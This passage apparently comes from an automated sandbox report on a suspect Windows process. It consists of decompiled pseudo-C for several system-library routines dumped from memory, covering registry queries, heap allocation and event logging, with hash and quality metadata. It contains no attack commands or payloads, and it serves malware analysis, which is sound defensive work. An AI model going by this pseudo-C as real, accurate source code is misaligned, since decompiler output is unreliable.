                                                              							__eflags =  *_t95 & 0x00000020;
                                                              							if(( *_t95 & 0x00000020) != 0) {
                                                              								E01067016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                              							}
                                                              						}
                                                              					}
                                                              					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                              						if( *0x10d8708 != 0) {
                                                              							_t118 =  *0x7ffe0330;
                                                              							_t123 =  *0x10d7b00; // 0x0
                                                              							asm("ror esi, cl");
                                                              							 *0x10db1e0(_v12, _v20, 0x20);
                                                              							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                              							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                              							asm("sbb esi, esi");
                                                              							_t120 =  ~_t50 & _t93;
                                                              						} else {
                                                              							_t120 = 0;
                                                              						}
                                                              					}
                                                              					if( !_t120 >= 0) {
                                                              						L19:
                                                              						_push( *_t105);
                                                              						E010295D0();
                                                              						 *_t105 =  *_t105 & 0x00000000;
                                                              						goto L20;
                                                              					}
                                                              					_t120 = E00FF7F65(_t119);
                                                              					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                              						__eflags = _t120;
                                                              						if(_t120 < 0) {
                                                              							goto L19;
                                                              						}
                                                              						 *(_t119 + 0x64) = _v12;
                                                              						goto L22;
                                                              					}
                                                              					goto L19;
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
                                                              • Instruction ID: c3e968f067e96caa4a9417e80f07f41a99be4a726ee6f86d293658605e134f65
                                                              • Opcode Fuzzy Hash: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
                                                              • Instruction Fuzzy Hash: 68910971E002159FEB71AA6CC844BEE7BE4AB05714F0502A5FDD1EB2D9EB789C80C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E00FEC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                              				signed int _v8;
                                                              				char _v1036;
                                                              				signed int _v1040;
                                                              				char _v1048;
                                                              				signed int _v1052;
                                                              				signed char _v1056;
                                                              				void* _v1058;
                                                              				char _v1060;
                                                              				signed int _v1064;
                                                              				void* _v1068;
                                                              				intOrPtr _v1072;
                                                              				void* _v1084;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t74;
                                                              				intOrPtr _t77;
                                                              				signed int _t78;
                                                              				signed int _t81;
                                                              				void* _t101;
                                                              				signed int _t102;
                                                              				signed int _t107;
                                                              				signed int _t109;
                                                              				signed int _t110;
                                                              				signed char _t111;
                                                              				signed int _t112;
                                                              				signed int _t113;
                                                              				signed int _t114;
                                                              				intOrPtr _t116;
                                                              				void* _t117;
                                                              				char _t118;
                                                              				void* _t120;
                                                              				char _t121;
                                                              				signed int _t122;
                                                              				signed int _t123;
                                                              				signed int _t125;
                                                              
                                                              				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                              				_v8 =  *0x10dd360 ^ _t125;
                                                              				_t116 = _a4;
                                                              				_v1056 = _a16;
                                                              				_v1040 = _a24;
                                                              				if(E00FF6D30( &_v1048, _a8) < 0) {
                                                              					L4:
                                                              					_pop(_t117);
                                                              					_pop(_t120);
                                                              					_pop(_t101);
                                                              					return E0102B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                              				}
                                                              				_t70 = _a20;
                                                              				if(_t70 >= 0x3f4) {
                                                              					_t121 = _t70 + 0xc;
                                                              					L19:
                                                              					_t107 =  *( *[fs:0x30] + 0x18);
                                                              					__eflags = _t107;
                                                              					if(_t107 == 0) {
                                                              						L60:
                                                              						_t68 = 0xc0000017;
                                                              						goto L4;
                                                              					}
                                                              					_t72 =  *0x10d7b9c; // 0x0
                                                              					_t74 = L01004620(_t107, _t107, _t72 + 0x180000, _t121);
                                                              					_v1064 = _t74;
                                                              					__eflags = _t74;
                                                              					if(_t74 == 0) {
                                                              						goto L60;
                                                              					}
                                                              					_t102 = _t74;
                                                              					_push( &_v1060);
                                                              					_push(_t121);
                                                              					_push(_t74);
                                                              					_push(2);
                                                              					_push( &_v1048);
                                                              					_push(_t116);
                                                              					_t122 = E01029650();
                                                              					__eflags = _t122;
                                                              					if(_t122 >= 0) {
                                                              						L7:
                                                              						_t114 = _a12;
                                                              						__eflags = _t114;
                                                              						if(_t114 != 0) {
                                                              							_t77 = _a20;
                                                              							L26:
                                                              							_t109 =  *(_t102 + 4);
                                                              							__eflags = _t109 - 3;
                                                              							if(_t109 == 3) {
                                                              								L55:
                                                              								__eflags = _t114 - _t109;
                                                              								if(_t114 != _t109) {
                                                              									L59:
                                                              									_t122 = 0xc0000024;
                                                              									L15:
                                                              									_t78 = _v1052;
                                                              									__eflags = _t78;
                                                              									if(_t78 != 0) {
                                                              										L010077F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                              									}
                                                              									_t68 = _t122;
                                                              									goto L4;
                                                              								}
                                                              								_t110 = _v1056;
                                                              								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              								_v1060 = _t118;
                                                              								__eflags = _t110;
                                                              								if(_t110 == 0) {
                                                              									L10:
                                                              									_t122 = 0x80000005;
                                                              									L11:
                                                              									_t81 = _v1040;
                                                              									__eflags = _t81;
                                                              									if(_t81 == 0) {
                                                              										goto L15;
                                                              									}
                                                              									__eflags = _t122;
                                                              									if(_t122 >= 0) {
                                                              										L14:
                                                              										 *_t81 = _t118;
                                                              										goto L15;
                                                              									}
                                                              									__eflags = _t122 - 0x80000005;
                                                              									if(_t122 != 0x80000005) {
                                                              										goto L15;
                                                              									}
                                                              									goto L14;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                              									goto L10;
                                                              								}
                                                              								_push( *((intOrPtr*)(_t102 + 8)));
                                                              								_t59 = _t102 + 0xc; // 0xc
                                                              								_push(_t110);
                                                              								L54:
                                                              								E0102F3E0();
                                                              								_t125 = _t125 + 0xc;
                                                              								goto L11;
                                                              							}
                                                              							__eflags = _t109 - 7;
                                                              							if(_t109 == 7) {
                                                              								goto L55;
                                                              							}
                                                              							_t118 = 4;
                                                              							__eflags = _t109 - _t118;
                                                              							if(_t109 != _t118) {
                                                              								__eflags = _t109 - 0xb;
                                                              								if(_t109 != 0xb) {
                                                              									__eflags = _t109 - 1;
                                                              									if(_t109 == 1) {
                                                              										__eflags = _t114 - _t118;
                                                              										if(_t114 != _t118) {
                                                              											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              											_v1060 = _t118;
                                                              											__eflags = _t118 - _t77;
                                                              											if(_t118 > _t77) {
                                                              												goto L10;
                                                              											}
                                                              											_push(_t118);
                                                              											_t56 = _t102 + 0xc; // 0xc
                                                              											_push(_v1056);
                                                              											goto L54;
                                                              										}
                                                              										__eflags = _t77 - _t118;
                                                              										if(_t77 != _t118) {
                                                              											L34:
                                                              											_t122 = 0xc0000004;
                                                              											goto L15;
                                                              										}
                                                              										_t111 = _v1056;
                                                              										__eflags = _t111 & 0x00000003;
                                                              										if((_t111 & 0x00000003) == 0) {
                                                              											_v1060 = _t118;
                                                              											__eflags = _t111;
                                                              											if(__eflags == 0) {
                                                              												goto L10;
                                                              											}
                                                              											_t42 = _t102 + 0xc; // 0xc
                                                              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                              											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                              											_push(_t111);
                                                              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                              											_push(0);
                                                              											_push( &_v1048);
                                                              											_t122 = E010213C0(_t102, _t118, _t122, __eflags);
                                                              											L44:
                                                              											_t118 = _v1072;
                                                              											goto L11;
                                                              										}
                                                              										_t122 = 0x80000002;
                                                              										goto L15;
                                                              									}
                                                              									_t122 = 0xc0000024;
                                                              									goto L44;
                                                              								}
                                                              								__eflags = _t114 - _t109;
                                                              								if(_t114 != _t109) {
                                                              									goto L59;
                                                              								}
                                                              								_t118 = 8;
                                                              								__eflags = _t77 - _t118;
                                                              								if(_t77 != _t118) {
                                                              									goto L34;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                              									goto L34;
                                                              								}
                                                              								_t112 = _v1056;
                                                              								_v1060 = _t118;
                                                              								__eflags = _t112;
                                                              								if(_t112 == 0) {
                                                              									goto L10;
                                                              								}
                                                              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                              								goto L11;
                                                              							}
                                                              							__eflags = _t114 - _t118;
                                                              							if(_t114 != _t118) {
                                                              								goto L59;
                                                              							}
                                                              							__eflags = _t77 - _t118;
                                                              							if(_t77 != _t118) {
                                                              								goto L34;
                                                              							}
                                                              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                              								goto L34;
                                                              							}
                                                              							_t113 = _v1056;
                                                              							_v1060 = _t118;
                                                              							__eflags = _t113;
                                                              							if(_t113 == 0) {
                                                              								goto L10;
                                                              							}
                                                              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                              							goto L11;
                                                              						}
                                                              						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              						__eflags = _t118 - _a20;
                                                              						if(_t118 <= _a20) {
                                                              							_t114 =  *(_t102 + 4);
                                                              							_t77 = _t118;
                                                              							goto L26;
                                                              						}
                                                              						_v1060 = _t118;
                                                              						goto L10;
                                                              					}
                                                              					__eflags = _t122 - 0x80000005;
                                                              					if(_t122 != 0x80000005) {
                                                              						goto L15;
                                                              					}
                                                              					L010077F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                              					L18:
                                                              					_t121 = _v1060;
                                                              					goto L19;
                                                              				}
                                                              				_push( &_v1060);
                                                              				_push(0x400);
                                                              				_t102 =  &_v1036;
                                                              				_push(_t102);
                                                              				_push(2);
                                                              				_push( &_v1048);
                                                              				_push(_t116);
                                                              				_t122 = E01029650();
                                                              				if(_t122 >= 0) {
                                                              					__eflags = 0;
                                                              					_v1052 = 0;
                                                              					goto L7;
                                                              				}
                                                              				if(_t122 == 0x80000005) {
                                                              					goto L18;
                                                              				}
                                                              				goto L4;
                                                              			}










































                                                              0x00000000
                                                              0x01057abf
                                                              0x01057ac1
                                                              0x00000000
                                                              0x00000000
                                                              0x01057ac3
                                                              0x01057ac6
                                                              0x00000000
                                                              0x00000000
                                                              0x01057ac8
                                                              0x01057acc
                                                              0x01057ad0
                                                              0x01057ad2
                                                              0x00000000
                                                              0x00000000
                                                              0x01057adb
                                                              0x00000000
                                                              0x01057adb
                                                              0x010579d6
                                                              0x010579d9
                                                              0x010579dc
                                                              0x01057a91
                                                              0x01057a94
                                                              0x00000000
                                                              0x01057a94
                                                              0x010579e2
                                                              0x00000000
                                                              0x010579e2
                                                              0x01057a74
                                                              0x01057a7a
                                                              0x00000000
                                                              0x00000000
                                                              0x01057a8a
                                                              0x01057a21
                                                              0x01057a21
                                                              0x00000000
                                                              0x01057a21
                                                              0x00fec650
                                                              0x00fec651
                                                              0x00fec656
                                                              0x00fec65c
                                                              0x00fec65d
                                                              0x00fec663
                                                              0x00fec664
                                                              0x00fec66a
                                                              0x00fec66e
                                                              0x010579c5
                                                              0x010579c7
                                                              0x00000000
                                                              0x010579c7
                                                              0x00fec67a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
                                                              • Instruction ID: 781ee5f66caf191f3464b30122eb50fc78bf57d00a4892c98ad7a8118e926f20
                                                              • Opcode Fuzzy Hash: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
                                                              • Instruction Fuzzy Hash: 8381A2756042428BEBA6CE58C880B7F77E9FB84350F54486AEEC59B241D330DD45DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 79%
                                                              			E01066DC9(signed int __ecx, void* __edx) {
                                                              				unsigned int _v8;
                                                              				intOrPtr _v12;
                                                              				signed int _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				char _v32;
                                                              				char _v36;
                                                              				char _v40;
                                                              				char _v44;
                                                              				char _v48;
                                                              				char _v52;
                                                              				char _v56;
                                                              				char _v60;
                                                              				void* _t87;
                                                              				void* _t95;
                                                              				signed char* _t96;
                                                              				signed int _t107;
                                                              				signed int _t136;
                                                              				signed char* _t137;
                                                              				void* _t157;
                                                              				void* _t161;
                                                              				void* _t167;
                                                              				intOrPtr _t168;
                                                              				void* _t174;
                                                              				void* _t175;
                                                              				signed int _t176;
                                                              				void* _t177;
                                                              
                                                              				_t136 = __ecx;
                                                              				_v44 = 0;
                                                              				_t167 = __edx;
                                                              				_v40 = 0;
                                                              				_v36 = 0;
                                                              				_v32 = 0;
                                                              				_v60 = 0;
                                                              				_v56 = 0;
                                                              				_v52 = 0;
                                                              				_v48 = 0;
                                                              				_v16 = __ecx;
                                                              				_t87 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                              				_t175 = _t87;
                                                              				if(_t175 != 0) {
                                                              					_t11 = _t175 + 0x30; // 0x30
                                                              					 *((short*)(_t175 + 6)) = 0x14d4;
                                                              					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                              					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                              					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                              					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                              					E01066B4C(_t167, _t11, 0x214,  &_v8);
                                                              					_v12 = _v8 + 0x10;
                                                              					_t95 = E01007D50();
                                                              					_t137 = 0x7ffe0384;
                                                              					if(_t95 == 0) {
                                                              						_t96 = 0x7ffe0384;
                                                              					} else {
                                                              						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					}
                                                              					_push(_t175);
                                                              					_push(_v12);
                                                              					_push(0x402);
                                                              					_push( *_t96 & 0x000000ff);
                                                              					E01029AE0();
                                                              					_t87 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                              					_t176 = _v16;
                                                              					if((_t176 & 0x00000100) != 0) {
                                                              						_push( &_v36);
                                                              						_t157 = 4;
                                                              						_t87 = E0106795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                              						if(_t87 >= 0) {
                                                              							_v24 = E0106795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                              							_v28 = E0106795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                              							_push( &_v52);
                                                              							_t161 = 5;
                                                              							_t168 = E0106795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                              							_v20 = _t168;
                                                              							_t107 = L01004620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                              							_v16 = _t107;
                                                              							if(_t107 != 0) {
                                                              								_v8 = _v8 & 0x00000000;
                                                              								 *(_t107 + 0x20) = _t176;
                                                              								 *((short*)(_t107 + 6)) = 0x14d5;
                                                              								_t47 = _t107 + 0x24; // 0x24
                                                              								_t177 = _t47;
                                                              								E01066B4C( &_v36, _t177, 0xc78,  &_v8);
                                                              								_t51 = _v8 + 4; // 0x4
                                                              								_t178 = _t177 + (_v8 >> 1) * 2;
                                                              								_v12 = _t51;
                                                              								E01066B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                              								_v12 = _v12 + _v8;
                                                              								E01066B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                              								_t125 = _v8;
                                                              								_v12 = _v12 + _v8;
                                                              								E01066B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                              								_t174 = _v12 + _v8;
                                                              								if(E01007D50() != 0) {
                                                              									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              								}
                                                              								_push(_v16);
                                                              								_push(_t174);
                                                              								_push(0x402);
                                                              								_push( *_t137 & 0x000000ff);
                                                              								E01029AE0();
                                                              								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                              								_t168 = _v20;
                                                              							}
                                                              							_t87 = L01002400( &_v36);
                                                              							if(_v24 >= 0) {
                                                              								_t87 = L01002400( &_v44);
                                                              							}
                                                              							if(_t168 >= 0) {
                                                              								_t87 = L01002400( &_v52);
                                                              							}
                                                              							if(_v28 >= 0) {
                                                              								return L01002400( &_v60);
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t87;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                              • Instruction ID: 7d4dab4bbff64a98d51aa9b0d907e67a8dd4c3c3adade51848820e6cda7f93a2
                                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                              • Instruction Fuzzy Hash: 86717C71A0061AEFDB11DFA8C984AEEBBF9FF48714F104069E545E7290DB34AA41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 39%
                                                              			E0107B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				signed int _t80;
                                                              				signed int _t83;
                                                              				intOrPtr _t89;
                                                              				signed int _t92;
                                                              				signed char _t106;
                                                              				signed int* _t107;
                                                              				intOrPtr _t108;
                                                              				intOrPtr _t109;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				void* _t117;
                                                              				void* _t119;
                                                              				void* _t122;
                                                              				signed int _t123;
                                                              				signed int* _t124;
                                                              
                                                              				_t106 = _a12;
                                                              				if((_t106 & 0xfffffffc) != 0) {
                                                              					return 0xc000000d;
                                                              				}
                                                              				if((_t106 & 0x00000002) != 0) {
                                                              					_t106 = _t106 | 0x00000001;
                                                              				}
                                                              				_t109 =  *0x10d7b9c; // 0x0
                                                              				_t124 = L01004620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                              				if(_t124 != 0) {
                                                              					 *_t124 =  *_t124 & 0x00000000;
                                                              					_t124[1] = _t124[1] & 0x00000000;
                                                              					_t124[4] = _t124[4] & 0x00000000;
                                                              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                              						L13:
                                                              						_push(_t124);
                                                              						if((_t106 & 0x00000002) != 0) {
                                                              							_push(0x200);
                                                              							_push(0x28);
                                                              							_push(0xffffffff);
                                                              							_t122 = E01029800();
                                                              							if(_t122 < 0) {
                                                              								L33:
                                                              								if((_t124[4] & 0x00000001) != 0) {
                                                              									_push(4);
                                                              									_t64 =  &(_t124[1]); // 0x4
                                                              									_t107 = _t64;
                                                              									_push(_t107);
                                                              									_push(5);
                                                              									_push(0xfffffffe);
                                                              									E010295B0();
                                                              									if( *_t107 != 0) {
                                                              										_push( *_t107);
                                                              										E010295D0();
                                                              									}
                                                              								}
                                                              								_push(_t124);
                                                              								_push(0);
                                                              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                              								L37:
                                                              								L010077F0();
                                                              								return _t122;
                                                              							}
                                                              							_t124[4] = _t124[4] | 0x00000002;
                                                              							L18:
                                                              							_t108 = _a8;
                                                              							_t29 =  &(_t124[0x105]); // 0x414
                                                              							_t80 = _t29;
                                                              							_t30 =  &(_t124[5]); // 0x14
                                                              							_t124[3] = _t80;
                                                              							_t123 = 0;
                                                              							_t124[2] = _t30;
                                                              							 *_t80 = _t108;
                                                              							if(_t108 == 0) {
                                                              								L21:
                                                              								_t112 = 0x400;
                                                              								_push( &_v8);
                                                              								_v8 = 0x400;
                                                              								_push(_t124[2]);
                                                              								_push(0x400);
                                                              								_push(_t124[3]);
                                                              								_push(0);
                                                              								_push( *_t124);
                                                              								_t122 = E01029910();
                                                              								if(_t122 != 0xc0000023) {
                                                              									L26:
                                                              									if(_t122 != 0x106) {
                                                              										L40:
                                                              										if(_t122 < 0) {
                                                              											L29:
                                                              											_t83 = _t124[2];
                                                              											if(_t83 != 0) {
                                                              												_t59 =  &(_t124[5]); // 0x14
                                                              												if(_t83 != _t59) {
                                                              													L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                              												}
                                                              											}
                                                              											_push( *_t124);
                                                              											E010295D0();
                                                              											goto L33;
                                                              										}
                                                              										 *_a16 = _t124;
                                                              										return 0;
                                                              									}
                                                              									if(_t108 != 1) {
                                                              										_t122 = 0;
                                                              										goto L40;
                                                              									}
                                                              									_t122 = 0xc0000061;
                                                              									goto L29;
                                                              								} else {
                                                              									goto L22;
                                                              								}
                                                              								while(1) {
                                                              									L22:
                                                              									_t89 =  *0x10d7b9c; // 0x0
                                                              									_t92 = L01004620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                              									_t124[2] = _t92;
                                                              									if(_t92 == 0) {
                                                              										break;
                                                              									}
                                                              									_t112 =  &_v8;
                                                              									_push( &_v8);
                                                              									_push(_t92);
                                                              									_push(_v8);
                                                              									_push(_t124[3]);
                                                              									_push(0);
                                                              									_push( *_t124);
                                                              									_t122 = E01029910();
                                                              									if(_t122 != 0xc0000023) {
                                                              										goto L26;
                                                              									}
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                              								}
                                                              								_t122 = 0xc0000017;
                                                              								goto L26;
                                                              							}
                                                              							_t119 = 0;
                                                              							do {
                                                              								_t114 = _t124[3];
                                                              								_t119 = _t119 + 0xc;
                                                              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                              								_t123 = _t123 + 1;
                                                              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                              							} while (_t123 < _t108);
                                                              							goto L21;
                                                              						}
                                                              						_push(0x28);
                                                              						_push(3);
                                                              						_t122 = E00FEA7B0();
                                                              						if(_t122 < 0) {
                                                              							goto L33;
                                                              						}
                                                              						_t124[4] = _t124[4] | 0x00000001;
                                                              						goto L18;
                                                              					}
                                                              					if((_t106 & 0x00000001) == 0) {
                                                              						_t115 = 0x28;
                                                              						_t122 = E0107E7D3(_t115, _t124);
                                                              						if(_t122 < 0) {
                                                              							L9:
                                                              							_push(_t124);
                                                              							_push(0);
                                                              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                              							goto L37;
                                                              						}
                                                              						L12:
                                                              						if( *_t124 != 0) {
                                                              							goto L18;
                                                              						}
                                                              						goto L13;
                                                              					}
                                                              					_t15 =  &(_t124[1]); // 0x4
                                                              					_t117 = 4;
                                                              					_t122 = E0107E7D3(_t117, _t15);
                                                              					if(_t122 >= 0) {
                                                              						_t124[4] = _t124[4] | 0x00000001;
                                                              						_v12 = _v12 & 0x00000000;
                                                              						_push(4);
                                                              						_push( &_v12);
                                                              						_push(5);
                                                              						_push(0xfffffffe);
                                                              						E010295B0();
                                                              						goto L12;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					return 0xc0000017;
                                                              				}
                                                              			}





















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
                                                              • Instruction ID: bd58453a90ab2cea533d9b3df92666b8f684408af7b5e5c2c4acf7a7e1c6c1c8
                                                              • Opcode Fuzzy Hash: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
                                                              • Instruction Fuzzy Hash: 4D710132A00702AFE732EF18CC44FAABBE5EF44724F144568E6D5876A0DBB5E940CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E00FE52A5(char __ecx) {
                                                              				char _v20;
                                                              				char _v28;
                                                              				char _v29;
                                                              				void* _v32;
                                                              				void* _v36;
                                                              				void* _v37;
                                                              				void* _v38;
                                                              				void* _v40;
                                                              				void* _v46;
                                                              				void* _v64;
                                                              				void* __ebx;
                                                              				intOrPtr* _t49;
                                                              				signed int _t53;
                                                              				short _t85;
                                                              				signed int _t87;
                                                              				signed int _t88;
                                                              				signed int _t89;
                                                              				intOrPtr _t101;
                                                              				intOrPtr* _t102;
                                                              				intOrPtr* _t104;
                                                              				signed int _t106;
                                                              				void* _t108;
                                                              
                                                              				_t93 = __ecx;
                                                              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                              				_push(_t88);
                                                              				_v29 = __ecx;
                                                              				_t89 = _t88 | 0xffffffff;
                                                              				while(1) {
                                                              					E00FFEEF0(0x10d79a0);
                                                              					_t104 =  *0x10d8210; // 0xb82d40
                                                              					if(_t104 == 0) {
                                                              						break;
                                                              					}
                                                              					asm("lock inc dword [esi]");
                                                              					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                              					E00FFEB70(_t93, 0x10d79a0);
                                                              					if( *((char*)(_t108 + 0xf)) != 0) {
                                                              						_t101 =  *0x7ffe02dc;
                                                              						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                              							L9:
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0x90028);
                                                              							_push(_t108 + 0x20);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push( *((intOrPtr*)(_t104 + 4)));
                                                              							_t53 = E01029890();
                                                              							__eflags = _t53;
                                                              							if(_t53 >= 0) {
                                                              								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                              									E00FFEEF0(0x10d79a0);
                                                              									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                              									E00FFEB70(0, 0x10d79a0);
                                                              								}
                                                              								goto L3;
                                                              							}
                                                              							__eflags = _t53 - 0xc0000012;
                                                              							if(__eflags == 0) {
                                                              								L12:
                                                              								_t13 = _t104 + 0xc; // 0xb82d4d
                                                              								_t93 = _t13;
                                                              								 *((char*)(_t108 + 0x12)) = 0;
                                                              								__eflags = E0101F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                              								if(__eflags >= 0) {
                                                              									L15:
                                                              									_t102 = _v28;
                                                              									 *_t102 = 2;
                                                              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                              									E00FFEEF0(0x10d79a0);
                                                              									__eflags =  *0x10d8210 - _t104; // 0xb82d40
                                                              									if(__eflags == 0) {
                                                              										__eflags =  *((char*)(_t108 + 0xe));
                                                              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                              										 *0x10d8210 = _t102;
                                                              										_t32 = _t102 + 0xc; // 0x0
                                                              										 *_t95 =  *_t32;
                                                              										_t33 = _t102 + 0x10; // 0x0
                                                              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                              										_t35 = _t102 + 4; // 0xffffffff
                                                              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                              										if(__eflags != 0) {
                                                              											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                              											E01064888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                              										}
                                                              										E00FFEB70(_t95, 0x10d79a0);
                                                              										asm("lock xadd [esi], eax");
                                                              										if(__eflags == 0) {
                                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                                              											E010295D0();
                                                              											L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              										}
                                                              										asm("lock xadd [esi], ebx");
                                                              										__eflags = _t89 == 1;
                                                              										if(_t89 == 1) {
                                                              											_push( *((intOrPtr*)(_t104 + 4)));
